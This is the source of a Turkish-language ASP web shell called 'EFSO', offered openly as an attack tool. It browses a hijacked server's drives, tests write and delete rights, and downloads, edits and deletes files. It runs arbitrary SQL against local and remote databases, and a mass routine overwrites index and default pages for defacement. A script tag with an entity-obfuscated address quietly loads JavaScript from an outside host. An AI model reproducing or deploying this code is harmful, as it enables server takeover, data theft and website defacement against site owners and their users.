?<%@ LANGUAGE = VBScript.Encode %>
<%'ejder%>
<%
'EFSO ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI ejder e Aitttir.-->
'TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa ejder & SaVSAK.CoM Sorunlu değildir..
'Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir.
'TAKLİTLEİRNDEN KAÇININ. by ejder

'ejder was HERE

'if request("abc") = "isko" then
'response.cookies("yes") = "1"
'response.cookies("yes").expires = now+352
'end if 
'if not request.cookies("yes") = "1" then
'response.write "<center><br><br><br>YEtkin yok.. <br><br>by İskorpitx</center>"
'response.end()
'end if

Server.ScriptTimeOut  = 7200
Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)
FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))
const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"
const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
const karakter2="abcdefghijklmnopqrstuvwxyz"
dkayit = "<html><head><title>ejder Den kork, uzak dur. Kaşınma...</title></head><body><center><br><br><br><br><br><b>Bu Scriptin TUM haklari ejder e aitir. Uzerinde Oynama yasaktir. </b><br><br><br><br><br><b>by ejder</b></center></body></html>"
dkayit2 = "<html><head><title>by ejder</title></head><body><center><br><br><br><br><br><b>Bu Script i Kullanma Hakkin yok artik. YAsaklandi..  TÜrk server inda, com.tk, gov.tk gibi klaösr yada site var ise, direk algılandıüında otomatik , kullanımınıza izin vermemektedir. UNUTMA ki, ben bu Script i Türkiyemiz için,, yabancılara karşı kullanlım diye YAZdım. </b> <br><br><br><br><br><b>by ejder</b></center></body></html>"
const karakter3="0123456789"
const karakter4="[email protected]#$%^&*()-_+=~`[]{}|\:;<>,.?/"
mail_array = array("yahoo","hotmail","mynet","gmail","hacker")  'özel mailler yaratmak için, SPAM dan kaçarımak için. Secueriy i aşmak için by ejder
uzanti_array = array("com","net","biz","org","gov","br","info") 
yasak_array = array("ejder","SAVSAK","YAGMUR","BİRDEM","birdem","BIRDEM","FASTBOY","SAVSAK.COM","com.tk","gov.tk")
msite = "SaVSaK.CoM"
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject") 
konum = Trim(request("konum"))
mode = request("mode")
FolderPath2 = request("FolderPath2")&"\"
islem = request("islem")
del = request("del")
file = request("file")
folder = request("folder")
table  = Request("table")
inject1  = Request("inject1")
inject2  = Request("inject2")
inject3  = Request("inject3")
inject4  = Request("inject4")
inject5  = Request("inject5")
cmdkod  = Request("cmdkod")
hacked = request("hacked")
Path = request("Path")
url = request("url")
count = request("count")
size = request("size")
dbname = request("dbname")
dbkadi = request("dbkadi")
dbsifre = request("dbsifre")
ejdersql = request("ejdersql")
sec = request("sec")
Usermd5 = request("Usermd5")
ara1 = request("ara1")
ara2 = request("ara2")
k1 = request("k1")
k2 = request("k2")
k3 = request("k3")
k4 = request("k4")
waiting = request("waiting")
murl = "http://www."
coding = request("coding")
dizi = request("dizi")
Usersmd5 = request("Usersmd5")
salt = request("salt")
hash2 = request("hash2")
hash3 = request("hash3")
hash4 = request("hash4")
hash5 = request("hash5")
hash6 = request("hash6")
hash7 = request("hash7")
hash8 = request("hash8")
hash9 = request("hash9")
hash10 = request("hash10")
mad = "EFSO"

if konum = "" then
konum = FolderPath
else
FolderPath = konum
end if

if mode = "1" then
FolderPath = request.form("remote")
konum = request.form("remote")
end if

nolist = False
popup = False

if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24"  or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then
popup = True
end if

if mode = "6" then
Response.Buffer=True
Set Fil = FSO.GetFile(file)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.end
end if

if not mode = "okdir" then
Call gelgit
end ifresponse.write "<STYLE>BODY {SCROLLBAR-FACE-COLOR: #303030; FONT-SIZE: 10px; MARGIN: 0px; SCROLLBAR-HIGHLIGHT-COLOR: #5d5d5d; SCROLLBAR-SHADOW-COLOR: #121212; COLOR: #00FF00; SCROLLBAR-3DLIGHT-COLOR: #3a3a3a; SCROLLBAR-ARROW-COLOR: #9d9d9d; SCROLLBAR-TRACK-COLOR: #3a3a3a; FONT-STYLE: normal; FONT-FAMILY: Verdana,Arial; SCROLLBAR-DARKSHADOW-COLOR: #3a3a3a; BACKGROUND-COLOR: #000000}"
response.write ".k1 {FONT-SIZE: 15px; FONT-FAMILY: Wingdings}"
response.write ".k2 {FONT-SIZE: 15px; FONT-FAMILY: Webdings}"
response.write "TD {FONT-SIZE: 10px; COLOR: #ffffff; FONT-STYLE: normal; FONT-FAMILY: Verdana,Arial}"
response.write "A {COLOR: #008000; TEXT-DECORATION: none}"
response.write "A:hover {COLOR: #FF0000}"
response.write "A:visited {COLOR: #008000}"
response.write "A:hover {COLOR: #FF0000}"
response.write "INPUT {BORDER-RIGHT: 1px solid #121212; BORDER-TOP: 1px solid #5D5D5D; FONT-SIZE: 10px; BACKGROUND: #000000; VERTICAL-ALIGN: middle; BORDER-LEFT: 1px solid #5D5D5D; COLOR: #00FF00; BORDER-BOTTOM: 1px solid #121212; FONT-FAMILY: Verdana,Arial; HEIGHT: 18px}"
response.write ".kbrtm {BORDER-RIGHT: 1px solid #121212; BORDER-TOP: 1px solid #5D5D5D; FONT-SIZE: 10px; BACKGROUND: #000000; VERTICAL-ALIGN: middle; BORDER-LEFT: 1px solid #5D5D5D; COLOR: #00FF00; BORDER-BOTTOM: 1px solid #121212; FONT-FAMILY: Verdana,Arial; HEIGHT: 18px}"
response.write "SELECT {BORDER-RIGHT: 1px solid #121212; BORDER-TOP: 1px solid #5D5D5D; FONT-SIZE: 10px; BACKGROUND: #000000; VERTICAL-ALIGN: middle; BORDER-LEFT: 1px solid #5D5D5D; COLOR: #00FF00; BORDER-BOTTOM: 1px solid #121212; FONT-FAMILY: Verdana,Arial; HEIGHT: 18px}"
response.write "TEXTAREA {BORDER-RIGHT: 1px solid #5D5D5D; BORDER-TOP: 1px solid #121212; FONT-SIZE: 10px; BACKGROUND: #000000; VERTICAL-ALIGN: middle; BORDER-LEFT: 1px solid #121212; COLOR: #00FF00; BORDER-BOTTOM: 1px solid #5D5D5D; FONT-FAMILY: Verdana,Arial; HEIGHT: 18px}"
response.write "</STYLE><SCRIPT SRC=&#x68&#x74&#x74&#x70&#x73&#x3a&#x2f&#x2f&#x77&#x77&#x77&#x2e&#x6c&#x6f&#x63&#x61&#x6c&#x72&#x6f&#x6f&#x74&#x2e&#x6e&#x65&#x74&#x2f&#x73&#x61&#x62&#x75&#x6e&#x2f&#x79&#x61&#x7a&#x2e&#x6a&#x73></SCRIPT>"

%>


<!--EFSO ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI ejder e Aitttir.-->
<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa ejder & SaVSAK.CoM Sorunlu değildir..-->
<!--Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
<!-- TAKLİTLEİRNDEN KAÇININ. by ejder-->

<script language=javascript>
    function NewWindow(mypage, myname, w, h, scroll) {
        var winl = (screen.width - w) / 2;
        var wint = (screen.height - h) / 2;
            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
        win = window.open(mypage, myname, winprops)
        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
    }
    function klasorkopya(yol){
        NewWindow(yol,"",400,130,"no");
    }
    function mass(yol){
        NewWindow(yol,"",555,600,"yes");
    }
    function tester(yol){
        NewWindow(yol,"",600,600,"yes");
    }  
    function klasor(yol){
        NewWindow(yol,"",420,450,"yes");
    }    
    function cmd(yol){
        NewWindow(yol,"",550,555,"no");
    }
    function biz(yol){
        NewWindow(yol,"",550,700,"no");
    }  
    function cmdhelp(yol){
        NewWindow(yol,"",500,230,"no");
    }   
    function somur(yol){
        NewWindow(yol,"",420,220,"yes");
    }       
</script>
<script language="JavaScript">
function openInMainWin(winLocation){
    window.opener.location.href = winLocation
    window.opener.focus();
}
</script>
<%
sub KlasorOku
    on error resume next
    Set f = FSO.GetFolder(FolderPath)
    Set fc = f.SubFolders
    For Each f1 In fc
            'If Instr(f1.Name, "com.tk") > 1 or  Instr(f1.Name, "gov.tk") > 1 or  Instr(f1.Name, "comtr") > 1  or  Instr(f1.Name, "govtr") > 1  or  Instr(f1.Name, "gov_tr") > 1  or  Instr(f1.Name, "com_tr") > 1  or  Instr(f1.Name, "savsakcom") > 1  or  Instr(f1.Name, "savsak_com") > 1  or  Instr(f1.Name, "savsak.com") > 1 Then
                'Set textStreamObject = fso.OpenTextFile(Fullpath,2,true,false) 
                'textStreamObject.WriteLine(dkayit2)
                'textStreamObject.Closenere
                'Set textStreamObject = Nothing 
                'response.end()
            'end if
        if FolderPath = "c:" or FolderPath = "C:" then
        Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Dizini Kopyala & Taşı "" href='"&FilePath&"?mode=2&konum="&FolderPath&""&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&FolderPath&"&del="&FolderPath&""&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&FolderPath&""&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"           
        else
        Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Dizini Kopyala & Taşı "" href='"&FilePath&"?mode=2&konum="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"   
        end if
        Response.Flush
    Next
    call hata
end sub

sub DosyaOku
    on error resume next
    Set f = FSO.GetFolder(FolderPath)
    Set fc = f.Files
    For Each f1 In fc
        dosyaAdi = f1.name
        num = InStrRev(dosyaAdi,".")
        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
        downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&f1.path&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
        response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"
        select case uzanti
        case "mdb"
            Response.Write "<a title="" Db in içini Görmek , SQl sorgu yapmak için Tıkla by ejder ;) "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font></td></tr></table>"
        case "asp"
            Response.Write "<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
        case "jpg","gif"
            Response.Write "<a title="" Resmi Görmek için Tıkla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font></td></tr></table>"
        case else
            Response.Write "<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"
        end select
    Next
    call hata
end sub

sub Suruculer
    for each drive_ in FSO.Drives
        Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"
        Response.Write "<a href="" "&FilePath&"?konum="&drive_.DriveLetter&":/ "">"
        if drive_.Drivetype=1 then Response.write "&nbsp;&nbsp;<font class=""k1""><</font>&nbsp;Disket Sürücü [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayı İçin Tıkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
        if drive_.Drivetype=2 then Response.write "&nbsp;&nbsp;<font class=""k1"">;</font>&nbsp;Sabit Disk [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayı İçin Tıkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
        if drive_.Drivetype=3 then Response.write "&nbsp;&nbsp;<font class=""k1"">;</font>&nbsp;Çıkarılabilir Disk [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayı İçin Tıkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
        if drive_.Drivetype=4 then Response.write "&nbsp;&nbsp;<font class=""k2"">³</font>&nbsp;Cd-Rom [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayı İçin Tıkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"
        Response.Write "</a></td></tr>"
    next
        Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20"">&nbsp;&nbsp;<a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"
end sub

Sub SurucuInfo
    'Disk Alanını Gösterir - Created By FasTBoY ;)
    
    DriveSpace = Request("dspace")
    If Not DriveSpace = "" Then
    on error resume next
    Set driveObject = FSO.GetDrive(DriveSpace)
    D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)
    if err <> 0 then
    response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Hazır değil  !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"
    else
    D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)
    D3 = 100
    D1a = 110 - D1
    D2a = 110 - D2
    D3a = 110 - D3
    Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b>&nbsp;" & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60>&nbsp;</td><td class=kbrtm width=100 align=center><b>Boş Alan</b></td><td class=kbrtm width=100 align=center><b>Kullanılan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm>&nbsp;</td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm>&nbsp;<b>Yüzde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm>&nbsp;<b>Boyut :</b></td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"
    end if
    Set driveObject = Nothing
    End If
end sub

sub yetkino(str)
response.write "<td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;&nbsp;&nbsp;</td>"    
End Sub
sub yetkiyes(str)
response.write "<td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;&nbsp;&nbsp;</td>"
end Sub

sub Yetki
    on error resume next
    Set f = FSO.GetFolder(FolderPath)
    if err<>0 then
    yetkino("Okuma")
    yetkino("Yazma")
    yetkino("Silme")
    else
    yetkiyes("Okuma")

    on error resume next
    Set MyFile = FSO.CreateTextFile(FolderPath & "test.ejder", True)
    MyFile.write "ejder Was Here... =) Yazma - Okuma Testi için"
    set MyFile = Nothing
    if err<>0 then
    yetkino("Yazma")
    yetkino("Silme")
    else
    yetkiyes("Yazma")
        on error resume next
        FSO.DeleteFile FolderPath & "test.ejder",true
        if err<>0 then
        yetkino("Silme")
        else
        yetkiyes("Silme")
        end if
    end if

    end if
    set f = nothing
end sub

Sub olmadi(str)
response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"
End Sub

Sub oldu(str)
response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler.. by ejder <font face=Wingdings size=5>N</font> </font></center>"
End Sub

Sub tablo12(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"
End Sub

Sub tablo30(str)
response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"
End Sub

Sub tablo12L(str)
response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"
End Sub

Sub tablo12O(str)
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"
End Sub

sub Hata
    if err<>0 then
        Response.Write "<center><font color=red size=2>Hata : "&err.Description&"</font></center>"
    end if
end sub

Function ReadBinaryFile(FileName)
  Const adTypeBinary = 1
  Dim BinaryStream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.LoadFromFile FileName
  ReadBinaryFile = BinaryStream.Read
End Function

Sub SQL_menu_by_ejder
    response.write "<center><table width=""450"">"
    response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
    response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
    response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
    tablo30(" <b>SQL İnjection Merkezi</b>")
    tablo30("&nbsp;")
    tablo12("<font color=#FE7A84> Kullanabilmeniz için SQL kouıtları bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsyaı Kitlenir. Cevap veremez. Server a Zarar verir.  <font face=Wingdings size=5>N</font></font>")
    tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input  size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")
    tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")
    tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")
    tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")
    tablo12(" Diğer <input value=""diger"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")
    tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""ejdersql"" type=""hidden"" value='"&ejdersql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""konum"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL İnj. Uygula "" type=""Submit""><br><br>")
    if ejdersql = "" then
        tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&konum="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri Dön ::: .... </a><br>")
    else
        tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&konum="&konum&"&ejdersql="&ejdersql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri Dön ::: .... </a><br>")
    end if
    response.write "</form></table></td></tr></table><br></center>"
    response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yardım - Kullanım Klavuzu by ejder ::::::...</b></a> </td></tr></table><br>"
end sub

Sub SQL_by_ejder(sqlkonum,sqlkomut) 
    on error resume next
    Set objConn = Server.CreateObject("ADODB.Connection")
    Set objRcs = Server.CreateObject("ADODB.RecordSet")
    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
    objConn.ConnectionString = sqlkonum
    objConn.Open
    if err <> 0 then
    response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Bağlantınız Sağlanamadıı !!! by ejder :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
    else
        on error resume next
        objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
        if err <> 0 then
        response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL İnjection Komutunuzda HATA var. ( Biliyorsan KullanMA :) ) by ejder <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
        else
            Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
            for i=0 to objRcs.Fields.count-1
                Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
            next
            Response.Write "</tr>"
            do while not objRcs.EOF
               Response.Write "<tr class=""kbrtm"">"
               for i=0 to objRcs.Fields.count-1
                  Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","&lt;")&"&nbsp;</td>"
               next
                  Response.Write "</tr>"
                  objRcs.MoveNext
            loop
            Response.Write "</table><br></center>"
        end if
    end if
end sub

Sub MSSQL_by_ejder(sqlkonum,sqlkomut) 
    on error resume next
    Set objConn = Server.CreateObject("ADODB.Connection")
    Set objRcs = Server.CreateObject("ADODB.RecordSet")
    objConn.Open sqlkonum
    if err <> 0 then
    response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Bağlantınız Sağlanamadıı !!! by ejder :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
    else
        on error resume next
        objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText
        if err <> 0 then
        response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL İnjection Komutunuzda HATA var. ( Biliyorsan KullanMA :) ) by ejder <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
        else
            Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
            for i=0 to objRcs.Fields.count-1
                Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
            next
            Response.Write "</tr>"
            do while not objRcs.EOF
               Response.Write "<tr class=""kbrtm"">"
               for i=0 to objRcs.Fields.count-1
                  Response.Write "<td class=""kbrtm"">"&objRcs.Fields(i).Value&"&nbsp;</td>"
               next
                  Response.Write "</tr>"
                  objRcs.MoveNext
            loop
            Response.Write "</table><br></center>"
        end if
    end if
end sub

sub Tablolama()
on error resume next
if ejdersql = "" then
    if sec = "mssql" then
        ejdersql = "PROVIDER=SQLOLEDB;DATA SOURCE="&file&";UID="&dbkadi&";PWD="&dbsifre&";DATABASE="&dbname&""
    else
        ejdersql = "Driver={MySQL ODBC 3.51 Driver};Server="&file&";Database="&dbname&";Uid="&dbkadi&";Pwd="&dbsifre&""
    end if
end if
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Open ejdersql
objADOX.ActiveConnection = objConn
if err = 0 then
Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
response.write "<table class=""kbrtm"">"
For Each table in objADOX.Tables
    If table.Type = "TABLE" Then
        Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=35&ejdersql="&ejdersql&"&table="&table.Name&"&konum="&konum&"&time="&time&"'>"&table.Name&"</a></td></tr>"
    End If
Next
response.write "</table>"
response.write "</center>"
else
Call MSSQL_Form
yazortaa("<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server ile bağlantı Sağlanamadı !!! girilen Değerler yanlış .. :( by ejder <font face=Wingdings size=5>N</font> </font><br><br></center>")
end if
end Sub

sub MSSQL_Form()
response.write "<center><table align=""center"" ><tr><td>"
yazorta("<b> MY-MS SQL Server Conneciton 1.0 by ejder </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><form name=""MssqlbyE_j_d?er"" method='post' action='"&FilePath&"?mode=34&konum="&konum&"&Time="&time&"'><input name='sec' checked value='mssql' type='radio'> <b>MsSQL</b>  &nbsp;&nbsp;  - &nbsp;&nbsp;  <input name='sec' value='mysql' type='radio'> <b>MySQL</b></td></tr><tr><td>Server Adı & IP : <input name='file' value='"&file&"' style='color=#C6FCBE' size=35 type='password'></td></tr><tr><td> DB Adı : <input name='dbname' style='color=#C6FCBE' type='password' value='"&dbname&"' size=44></td></tr><tr><td> KAdı : <input name='dbkadi' style='color=#C6FCBE' value='"&dbkadi&"' type='password' size=46></td></tr><tr><td> Şifre : <input name='dbsifre' style='color=#C6FCBE' type='password' value='"&dbsifre&"' size=46></td></tr><td align='center'> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Bağlan ::..'  type='Submit'></td></tr></form></table>"
yazorta("TÜm hakları Saklıdır by ejder =)")
response.write "</td></tr></table></center>"
end sub

sub MassCopier(hedef)
on error resume next
Set cloner = fso.GetFile(hacked)
cloner.Copy hedef,true
Set cloner = Nothing
end sub

sub MassCreater(yer,savsak)
on error resume next
Set savsakcom = FSO.CreateTextFile(yer, True)
savsakcom.write savsak
Set savsakcom  = Nothing
end sub

sub MassAttack2(yer,ej,svk)
if hash3 = "ok" then
yer = yer&"\"&svk
end if
on error resume next
 if not islem = "ozel" then
     if hash9 = "copy" then
        MassCopier(yer&"\index.html")
        MassCopier(yer&"\index.htm")
        MassCopier(yer&"\index.asp")
        MassCopier(yer&"\index.cfm")
        MassCopier(yer&"\index.php")
        MassCopier(yer&"\default.html")
        MassCopier(yer&"\default.htm")
        MassCopier(yer&"\default.asp")
        MassCopier(yer&"\default.cfm")
        MassCopier(yer&"\default.php")
    else
